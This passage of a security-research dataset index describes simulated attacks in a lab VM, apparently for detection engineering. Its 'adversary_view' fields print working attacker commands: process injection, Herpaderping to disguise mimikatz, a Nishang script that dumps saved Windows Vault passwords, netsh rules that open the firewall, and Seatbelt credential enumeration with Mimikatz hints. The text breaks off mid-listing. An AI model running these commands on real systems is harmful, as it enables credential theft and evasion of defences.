+            "adversary_view": "C:\\Users\\wardog\\Desktop>PurpleSharp.exe /t T1055.002\n10/23/2020 03:12:04 [*]  Starting T1055.002 Simulation on WORKSTATION5\n10/23/2020 03:12:04 [*]  Simulator running from C:\\Users\\wardog\\Desktop\\PurpleSharp.exe with PID:8972 as WORKSTATION5\\wardog\n10/23/2020 03:12:04 [*]  Process notepad.exe with PID:9908 started for the injection\n10/23/2020 03:12:04 [*]  Calling OpenProcess on PID:9908\n10/23/2020 03:12:04 [*]  Calling VirtualAllocEx on PID:9908\n10/23/2020 03:12:04 [*]  Calling WriteProcessMemory on PID:9908\n10/23/2020 03:12:04 [*]  Calling CreateRemoteThread on PID:9908\n10/23/2020 03:12:04 [*]  Simulation Finished\n10/23/2020 03:12:04 [*]  Playbook Finished\n\nC:\\Users\\wardog\\Desktop>"
+        },
+        "references": [
+            "https://github.com/mvelazc0/PurpleSharp/blob/master/PurpleSharp/Simulations/DefenseEvasion.cs#L216-L238"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:59.909107+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201026235835.yaml": {
+        "title": "Process Herpaderping Mimikatz",
+        "id": "SDWIN-201026235835",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/26",
+        "modification_date": "2020/10/26",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents the execution of a Process Herpaderping to obscure the intentions of a process by modifying the content on disk after the image has been mapped.",
+        "attack_mappings": [
+            {
+                "technique": "T1055",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/jxy-s/herpaderping"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\Users\\wardog>cd Desktop\n\nC:\\Users\\wardog\\Desktop>ProcessHerpaderping.exe mimikatz.exe wardog.exe C:\\Windows\\system32\\SnippingTool.exe\nProcess Herpaderping Tool - Copyright (c) 2020 Johnny Shaw\n[12140:10252][OK]    Source File: \"mimikatz.exe\"\n[12140:10252][OK]    Target File: \"wardog.exe\"\n[12140:10252][INFO]  Copied source binary to target file\n[12140:10252][INFO]  Created image section for target\n[12140:10252][INFO]  Created process object, PID 8924\n[12140:10252][INFO]  Located target image entry RVA 0x000c3aec\n[12140:10252][OK]    Replacing target with \"C:\\Windows\\system32\\SnippingTool.exe\"\n[12140:10252][OK]    Preparing target for execution\n[12140:10252][INFO]  Writing process parameters, remote PEB ProcessParameters 0x0000000000AED020\n[12140:10252][INFO]  Creating thread in process at entry point 0x00007FF733E63AEC\n[12140:10252][INFO]  Created thread, TID 12112\n[12140:10252][OK]    Waiting for herpaderped process to exit\n[12140:10252][OK]    Herpaderped process exited with code 0xc000013a\n[12140:10252][OK]    Process Herpaderp Succeeded\n\nC:\\Users\\wardog\\Desktop>"
+        },
+        "references": [
+            "https://github.com/jxy-s/herpaderping",
+            "https://twitter.com/jxy__s/status/1320853852153769984"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:00.090140+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201028191914.yaml": {
+        "title": "Windows Vault Web Credentials",
+        "id": "SDWIN-201028191914",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/28",
+        "modification_date": "2020/10/28",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents threat actors accessing the Windows Vault and reading web credentials saved.",
+        "attack_mappings": [
+            {
+                "technique": "T1055",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "PowerShell",
+                    "module": "PowerShell",
+                    "script": "https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Add Web Credentials\n-------------------\nPS > $pv = New-Object Windows.Security.Credentials.PasswordVault\nPS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', '[placeholder]')\nPS >$pv.Add($pw)\n\nImport Get-WebCredentials\n-------------------------\nfunction Get-WebCredentials\n{\n  <#\n  .SYNOPSIS\n  Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)\n  .DESCRIPTION\n  This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script \n  also needs PowerShell v3 onwards and must be run from an elevated shell.\n  .EXAMPLE\n  PS > Get-WebCredentials\n  .LINK\n  https://github.com/samratashok/nishang\n  #>\n  [CmdletBinding()] Param ()\n  \n  \n  #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage\n  $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]\n  $VaultObj = new-object Windows.Security.Credentials.PasswordVault\n  $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }\n}\n\nRun Get-WebCredentials\n----------------------\nPS C:\\Users\\wardog> Get-WebCredentials\n\nUserName Resource                Password  Properties\n-------- --------                --------  ----------\npgustavo http://ossemproject.com [placeholder] {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...\n\n\nPS C:\\Users\\wardog>"
+        },
+        "references": [
+            "https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:00.261197+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201029001615.yaml": {
+        "title": "Python HTTP Server",
+        "id": "SDWIN-201029001615",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/29",
+        "modification_date": "2020/10/29",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents threat actors adding a FW inbound rule and starting a Python HTTP Server.",
+        "attack_mappings": [
+            {
+                "technique": "T1059",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/psh_python_webserver.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "PowerShell",
+                    "module": "PowerShell",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Add Firewall Rule\n-----------------\nPS > & netsh advfirewall firewall add rule name=\"python.exe\" dir=in action=allow description=\"python.exe\" program=\"C:\\users\\wardog\\appdata\\local\\programs\\python\\python39\\python.exe\" enable=yes localport=any protocol=tcp remoteip=any\nOk.    \n\nPS > & netsh advfirewall firewall add rule name=\"python.exe\" dir=in action=allow description=\"python.exe\" program=\"C:\\users\\wardog\\appdata\\local\\programs\\python\\python39\\python.exe\" enable=yes localport=any protocol=udp remoteip=any\nOk.\n\nStart HTTP Server\n-----------------\nPS > python -m http.server 8000\n\nServing HTTP on :: port 8000 (http://[::]:8000/) ..."
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:50:00.473818+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201029202324.yaml": {
+        "title": "SharpView PCRE.NET",
+        "id": "SDWIN-201029202324",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/29",
+        "modification_date": "2020/10/29",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor leveraging SharpView and specific functions such as Get-ObjectAcl creating files and loading dlls related to PCRE.NET use.",
+        "attack_mappings": [
+            {
+                "technique": "T1059",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/cmd_sharpview_pcre_net.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\ProgramData>SharpView.exe Get-ObjectAcl -SamAccountName \"Domain Admins\"\n[Get-DomainSearcher] search base: LDAP://MORDORDC.THESHIRE.LOCAL/DC=THESHIRE,DC=LOCAL\n[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))\nObjectDN                       : CN=Domain Admins,CN=Users,DC=theshire,DC=local\nObjectAceFlags                 : ObjectAceTypePresent, InheritedObjectAceTypePresent\nObjectAceType                  : 4c164200-20c0-11d0-a768-00aa006e0529\nInheritedObjectAceType         : 4828cc14-1437-45bc-9b07-ad6f015e5f28\nBinaryLength                   : 60\nAceQualifier                   : AccessAllowed\nIsCallback                     : False\nOpaqueLength                   : 0\nAccessMask                     : 16\nSecurityIdentifier             : S-1-5-32-554\nAceType                        : AccessAllowedObject\nAceFlags                       : None\nIsInherited                    : False\nInheritanceFlags               : None\nPropagationFlags               : None\nAuditFlags                     : None\nObjectSID                      : S-1-5-21-3140987116-517580383-2541594433-512\nActiveDirectoryRights          : ReadProperty\n..\n....."
+        },
+        "references": [
+            "https://github.com/tevora-threat/SharpView",
+            "https://twitter.com/rbmaslen/status/1321859647091970051",
+            "https://twitter.com/tifkin_/status/1321916444557365248"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:00.665619+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201102041306.yaml": {
+        "title": "PowerShell HTTP Listener",
+        "id": "SDWIN-201102041306",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/11/02",
+        "modification_date": "2020/11/02",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor using PowerShell to start an HTTP Listener on a compromised endpoint",
+        "attack_mappings": [
+            {
+                "technique": "T1059",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/psh_powershell_httplistener.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "PowerShell",
+                    "module": "PowerShell",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "$Hso = New-Object Net.HttpListener\n$Hso.Prefixes.Add(\"http://+:8000/\")\n$Hso.Start() "
+        },
+        "references": [
+            "https://docs.microsoft.com/en-us/dotnet/api/system.net.httplistener?view=netcore-3.1"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:00.925619+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201102163918.yaml": {
+        "title": "Seatbelt Group User Discovery",
+        "id": "SDWIN-201102163918",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/11/02",
+        "modification_date": "2020/11/02",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor using Seatbelt profiling an endpoint. This specifically uses the -group=user command.",
+        "attack_mappings": [
+            {
+                "technique": "T1012",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/cmd_seatbelt_group_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/GhostPack/Seatbelt"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\Users\\wardog\\Desktop>Seatbelt.exe -group=user\n\n                        %&&@@@&&\n                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%\n                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%\n%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((\n#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((\n#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((\n#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((\n#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####\n###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####\n#####%######################  %%%..                       @////(((&%%%%%%%################\n                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*\n                        &%%&&&%%%%%        v1.1.0         ,(((&%%%%%%%%%%%%%%%%%,\n                        #%%%%##,\n\n\n====== ChromePresence ======\n\n  C:\\Users\\wardog\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\\n\n    'History'     (11/2/2020 4:25:44 PM)  :  Run the 'ChromeHistory' command\n    'Cookies'     (11/2/2020 4:25:45 PM)  :  Run SharpDPAPI/SharpChrome or the Mimikatz \"dpapi::chrome\" module\n    'Login Data'  (11/2/2020 4:25:44 PM)  :  Run SharpDPAPI/SharpChrome or the Mimikatz \"dpapi::chrome\" module\n    Chrome Version                       :  86.0.4240.183\n        Version is 80+, new DPAPI scheme must be used\n====== CloudCredentials ======\n\n====== CredEnum ======\n\n  Target              : XboxLive\n  UserName            :\n  Password            : 45 43 53 32 20 00 00 00 11 F5 17 F2 CA 4E 24 26 0A 61 2C 8B E6 3A 3C 99 9A 09 88 A1 BE 7B BA 72 07 8A 5D CD A1 B3 A4 18 60 38 AD 4B 6D 40 5C 05 68 C3 A6 C8 51 C0 98 7C CB 3C DA AA 65 88 E6 B8 C0 93 BA FE 21 E5 34 7B A0 A9 F2 4B EF 09 D1 1E AE 10 AD 98 E7 AE C6 9B 27 D2 CF 50 39 CC 97 78 E9 0D 82 E3 1B 11 4C 90\n  CredentialType      : Generic\n  PersistenceType     : Session\n  LastWriteTime       : 10/29/2020 5:51:36 PM\n\n  Target              : threathunterplaybook.com\n  UserName            : wardog\n  Password            :\n  CredentialType      : DomainPassword\n  PersistenceType     : Enterprise\n  LastWriteTime       : 10/28/2020 7:13:44 PM\n\n====== dir ======\n\n  LastAccess LastWrite  Size      Path\n\n  20-09-07   20-09-07   0B        C:\\Users\\Default\\Documents\\My Music\\\n  20-09-07   20-09-07   0B        C:\\Users\\Default\\Documents\\My Pictures\\\n  20-09-07   20-09-07   0B        C:\\Users\\Default\\Documents\\My Videos\\\n  20-10-26   20-11-02   1.7KB     C:\\Users\\Public\\Desktop\\Git Bash.lnk\n  20-11-02   20-11-02   2.2KB     C:\\Users\\Public\\Desktop\\Google Chrome.lnk\n  20-10-08   20-10-28   0B        C:\\Users\\Public\\Documents\\Explorer Suite Signatures\\\n  20-09-07   20-09-07   0B        C:\\Users\\Public\\Documents\\My Music\\\n  20-09-07   20-09-07   0B        C:\\Users\\Public\\Documents\\My Pictures\\\n  20-09-07   20-09-07   0B        C:\\Users\\Public\\Documents\\My Videos\\\n  20-10-25   20-11-02   0B        C:\\Users\\wardog\\Desktop\\capa-v1.4.1-windows\\\n  20-10-18   20-11-02   0B        C:\\Users\\wardog\\Desktop\\Dumpert-master\\\n  20-10-13   20-11-02   0B        C:\\Users\\wardog\\Desktop\\GruntDLL\\\n  20-10-25   20-11-02   0B        C:\\Users\\wardog\\Desktop\\mimikatz_trunk\\\n  20-10-29   20-11-02   0B        C:\\Users\\wardog\\Desktop\\SharpView-master\\\n  20-10-09   20-11-02   0B        C:\\Users\\wardog\\Desktop\\SimpleInjection\\\n  20-10-13   20-11-02   0B        C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\\n  20-10-23   20-10-23   1.9KB     C:\\Users\\wardog\\Desktop\\0001.dat\n  20-10-18   20-10-18   81.2KB    C:\\Users\\wardog\\Desktop\\Dumpert-master.zip\n  20-10-13   20-10-13   8.4MB     C:\\Users\\wardog\\Desktop\\GruntDLL.zip\n  20-10-13   20-10-13   42.1KB    C:\\Users\\wardog\\Desktop\\GruntHTTP.bin\n  20-10-21   20-11-02   392.9MB   C:\\Users\\wardog\\Desktop\\igfx_win10_100.8853.exe\n  20-10-08   20-11-02   1.4KB     C:\\Users\\wardog\\Desktop\\Microsoft Edge.lnk\n  20-10-25   20-11-02   1.2MB     C:\\Users\\wardog\\Desktop\\mimikatz.exe\n  20-10-27   20-10-29   33B       C:\\Users\\wardog\\Desktop\\my_first_rule\n  20-10-18   20-11-02   74KB      C:\\Users\\wardog\\Desktop\\Outflank-Dumpert.exe\n  20-10-28   20-10-29   1.8KB     C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.yara\n  20-10-27   20-11-02   1.9KB     C:\\Users\\wardog\\Desktop\\Process Hacker 2.lnk\n  20-10-26   20-11-02   2.1MB     C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe\n  20-10-27   20-10-27   1.6KB     C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe.colors\n  20-10-27   20-10-27   15.7MB    C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe.viv\n  20-10-23   20-11-02   266.5KB   C:\\Users\\wardog\\Desktop\\PurpleSharp.exe\n  20-10-21   20-11-02   505.5KB   C:\\Users\\wardog\\Desktop\\Seatbelt.exe\n  20-10-29   20-10-29   651.3KB   C:\\Users\\wardog\\Desktop\\SharpView-master.zip\n  20-10-13   20-10-13   1.4MB     C:\\Users\\wardog\\Desktop\\SimpleInjection 2.zip\n  20-10-16   20-10-23   53KB      C:\\Users\\wardog\\Desktop\\SimpleInjection.dll\n  20-10-08   20-10-08   22.8MB    C:\\Users\\wardog\\Desktop\\SimpleInjection.zip\n  20-10-17   20-10-17   15.2KB    C:\\Users\\wardog\\Desktop\\sysmon.xml\n  20-10-09   20-10-27   209.5KB   C:\\Users\\wardog\\Desktop\\test.dll\n  20-10-27   20-10-27   1.1KB     C:\\Users\\wardog\\Desktop\\test.dll.colors\n  20-10-10   20-10-10   208.2KB   C:\\Users\\wardog\\Desktop\\test.json\n  20-10-09   20-10-12   88.5KB    C:\\Users\\wardog\\Desktop\\test2.dll\n  20-10-27   20-11-02   2.1MB     C:\\Users\\wardog\\Desktop\\yara64.exe\n  20-10-27   20-11-02   2MB       C:\\Users\\wardog\\Desktop\\yarac64.exe\n  20-10-26   20-11-02   0B        C:\\Users\\wardog\\Documents\\herpaderping\\\n  20-10-18   20-10-28   0B        C:\\Users\\wardog\\Documents\\LocaleMetaData\\\n  20-10-08   20-10-08   0B        C:\\Users\\wardog\\Documents\\My Music\\\n  20-10-08   20-10-08   0B        C:\\Users\\wardog\\Documents\\My Pictures\\\n  20-10-08   20-10-08   0B        C:\\Users\\wardog\\Documents\\My Videos\\\n  20-10-18   20-10-28   0B        C:\\Users\\wardog\\Documents\\Raccine(1)\\\n  20-11-02   20-11-02   0B        C:\\Users\\wardog\\Documents\\Set-AuditRule-master\\\n  20-10-08   20-10-28   0B        C:\\Users\\wardog\\Documents\\TagsRevisited\\\n  20-10-08   20-10-30   0B        C:\\Users\\wardog\\Documents\\Visual Studio 2019\\\n  20-10-17   20-10-28   0B        C:\\Users\\wardog\\Documents\\WindowsPowerShell\\\n  20-10-08   20-10-08   8.4MB     C:\\Users\\wardog\\Documents\\GruntDLL.zip\n  20-10-21   20-11-02   8.1KB     C:\\Users\\wardog\\Documents\\Mordor-WinEvents.psm1\n  20-11-02   20-11-02   208.2KB   C:\\Users\\wardog\\Documents\\psh_powershell_httplistener_2020-11-0204130683.json\n  20-10-29   20-10-29   3.4MB     C:\\Users\\wardog\\Documents\\psh_python_webserver_2020-10-2900161507.json\n  20-10-28   20-10-28   208.9KB   C:\\Users\\wardog\\Documents\\psh_web_credentials_2020-10-2819191483.json\n  20-10-18   20-10-18   283.3KB   C:\\Users\\wardog\\Documents\\Raccine(1).zip\n  20-11-02   20-11-02   879.8KB   C:\\Users\\wardog\\Documents\\Set-AuditRule-master.zip\n  20-10-20   20-10-21   10.3KB    C:\\Users\\wardog\\Documents\\Set-AuditRule.ps1\n  20-10-16   20-10-16   2.3KB     C:\\Users\\wardog\\Documents\\Start-EtwTrace.ps1\n  20-10-16   20-10-16   47.4KB    C:\\Users\\wardog\\Documents\\TLGMetadataParser.ps1\n  20-10-16   20-10-16   47.4KB    C:\\Users\\wardog\\Documents\\TLGMetadataParser.psm1\n  20-10-27   20-10-27   6.6KB     C:\\Users\\wardog\\Documents\\udl-yara.xml\n  20-10-27   20-10-27   6KB       C:\\Users\\wardog\\Documents\\YARA.xml\n  20-10-10   20-10-28   0B        C:\\Users\\wardog\\Downloads\\evtx_dump-0.6.8-x86_64-pc-windows-msvc.tar\\\n  20-10-10   20-10-28   0B        C:\\Users\\wardog\\Downloads\\fd-v8.1.1-x86_64-pc-windows-msvc\\\n  20-10-08   20-11-02   0B        C:\\Users\\wardog\\Downloads\\Koppeling-master\\\n  20-10-27   20-10-28   0B        C:\\Users\\wardog\\Downloads\\OpenJDK11U-jdk_x64_windows_hotspot_11.0.9_11\\\n  20-10-19   20-10-28   0B        C:\\Users\\wardog\\Downloads\\PSTools\\\n  20-10-09   20-10-28   0B        C:\\Users\\wardog\\Downloads\\Sysmon\\\n  20-10-27   20-10-28   0B        C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64\\\n  20-10-25   20-10-25   11.1MB    C:\\Users\\wardog\\Downloads\\capa-v1.4.1-windows.zip\n  20-10-10   20-10-10   1.2MB     C:\\Users\\wardog\\Downloads\\evtx_dump-0.6.8-x86_64-pc-windows-msvc.tar.gz\n  20-10-10   20-10-10   898.4KB   C:\\Users\\wardog\\Downloads\\fd-v8.1.1-x86_64-pc-windows-msvc.zip\n  20-10-27   20-10-27   67.5MB    C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build.zip\n  20-10-08   20-10-08   36.3KB    C:\\Users\\wardog\\Downloads\\Koppeling-master.zip\n  20-10-25   20-10-25   1.1MB     C:\\Users\\wardog\\Downloads\\mimikatz_trunk.zip\n  20-10-27   20-10-27   186.7MB   C:\\Users\\wardog\\Downloads\\OpenJDK11U-jdk_x64_windows_hotspot_11.0.9_11.zip\n  20-10-19   20-10-19   3MB       C:\\Users\\wardog\\Downloads\\PSTools.zip\n  20-10-09   20-10-09   1.8MB     C:\\Users\\wardog\\Downloads\\Sysmon.zip\n  20-10-27   20-10-27   2MB       C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64.zip\n====== DpapiMasterKeys ======\n\n  Folder : C:\\Users\\wardog\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3940915590-64593676-1414006259-500\n\n    LastAccessed              LastModified              FileName\n    ------------              ------------              --------\n    10/18/2020 3:41:37 AM     10/18/2020 3:41:37 AM     ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n\n\n  [*] Use the Mimikatz \"dpapi::masterkey\" module with appropriate arguments (/pvk or /rpc) to decrypt\n  [*] You can also extract many DPAPI masterkeys from memory with the Mimikatz \"sekurlsa::dpapi\" module\n  [*] You can also use SharpDPAPI for masterkey retrieval.\n====== ExplorerMRUs ======\n\n  Explorer  BUILTIN\\Administrators  2020-11-02  C:\\Users\\wardog\\Documents\\cmd_psexec_lsa_secrets_dump_2020-10-2001090629.json\n  Explorer  BUILTIN\\Administrators  2020-11-02  C:\\Users\\wardog\\Documents\\AMSITLGTrace.evtx\n  Explorer  BUILTIN\\Administrators  2020-11-02  C:\\Windows\\System32\\amsi.dll\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\Mordor-WinEvents.psm1\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\MordorDataset.json\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\mordor_raccine_simulation_mode_2020-10-18T05154752.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\Koppeling-master\\Koppeling-master\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\Koppeling-master\\Koppeling-master\\Koppeling.sln\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Windows\\System32\\winevt\\Logs\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-Sysmon%4Operational.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\GruntDLL\\GruntDLL\\GruntDLL.sln\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\Export-WinEvents.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\export.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build\\ghidra-Ghidra_9.1.2_build\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\GruntDLL\\GruntDLL\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\GruntDLL.zip\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\export.json\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\Export-EventLogs.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\Dumpert-master\\Dumpert-master\\Dumpert\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build\\ghidra-Ghidra_9.1.2_build\\DevGuide.md\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\cmd_sam_copy_esentutl_2020-10-1900171197.json\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\cmd_sam_copy_esentutl_2020-10-1823514110.json\n  Explorer  BUILTIN\\Administrators  2020-10-29  C:\\Users\\wardog\\Desktop\\SharpView-master\\SharpView-master\n  Explorer  BUILTIN\\Administrators  2020-10-29  C:\\Users\\wardog\\Desktop\\SharpView-master\\SharpView-master\\SharpView.sln\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\YARA.xml\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64.zip\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript4.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript5.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript3.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\wmic_remote_xsl_jscript2.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\wmic_remote_xsl_jscript.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\udl-yara.xml\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\TLGMetadataParser.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\TLGMetadataParser.psm1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\test.txt\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\test.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\test.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\test.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Windows\\System32\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\sysmon.xml\n  Explorer  